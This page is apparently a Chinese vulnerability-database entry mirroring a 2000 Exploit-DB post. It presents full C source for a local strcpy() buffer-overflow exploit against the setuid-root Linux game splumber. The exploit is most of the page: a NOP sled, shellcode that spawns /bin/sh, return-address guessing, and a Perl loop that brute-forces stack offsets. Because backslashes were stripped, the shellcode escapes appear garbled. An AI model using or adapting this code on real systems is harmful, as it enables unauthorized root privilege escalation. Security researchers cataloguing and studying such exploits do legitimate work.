xsplumber – ‘strcpy()’ Local Buffer Overflow

xsplumber – ‘strcpy()’ Local Buffer Overflow

漏洞ID 1053480 漏洞类型
发布时间 2000-11-17 更新时间 2000-11-17
图片[1]-xsplumber – ‘strcpy()’ Local Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-xsplumber – ‘strcpy()’ Local Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/186
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
   (linux)splumber[version2] buffer overflow, by v9[[email protected]].  this is
   a misc. exploit for the linux-SVGAlib space plumber game.  which, as you
   know needs to be installed setuid root.  this overflow is due to a simple
   oversight in the command line parser.  uses strcpy() to copy to an unchecked
   250 byte buffer.

   note: i also noticed, other than just being setuid root in the makefile, it
         sets splumber's permissions to 4777. *g*

   ...and here is the perl script for the lazy person:

   #!/usr/bin/perl
   $i=$ARGV[0];
   while(1){
    print "using offset: $i.n";
    system("./xsplumber $i");
    $i+=50;
   }
*/

#define PATH "/usr/games/splumber"	// change to the correct path.
#define BUFFER_SIZE 257			// don't change.
#define DEFAULT_OFFSET -300		// worked for me.

static char exec[]=
  "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0fxb8x1bx56"
  "x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80"
  "xe8xd7xffxffxffx2fx62x69x6ex2fx73x68x01"; // still like it.

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
  char bof[BUFFER_SIZE];
  int i,offset;
  long ret;
  if(argc>1){offset=atoi(argv[1]);}
  else{offset=DEFAULT_OFFSET;}
  ret=(esp()-offset);
  printf("*** (linux)splumber[version2] local buffer overflow, by v9[[email protected]].n");
  printf("*** return address: 0x%lx, offset: %d.n",ret,offset);
  for(i=0;i<(252-strlen(exec));i++){*(bof+i)=0x90;}
  memcpy(bof+i,exec,strlen(exec));
  *(long *)&bof[i+strlen(exec)]=ret; // perfect, not lazy for once.
  bof[BUFFER_SIZE-1]=0;
  if(execlp(PATH,"splumber",bof,0)){
    printf("error: program did not execute properly, check the path.n");
    exit(0);
  }
}


# milw0rm.com [2000-11-17]

相关推荐: NT IIS ASP VBScript Runtime Error Viewable Source Vulnerability

NT IIS ASP VBScript Runtime Error Viewable Source Vulnerability 漏洞ID 1104336 漏洞类型 Design Error 发布时间 2000-02-09 更新时间 2000-02-09 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享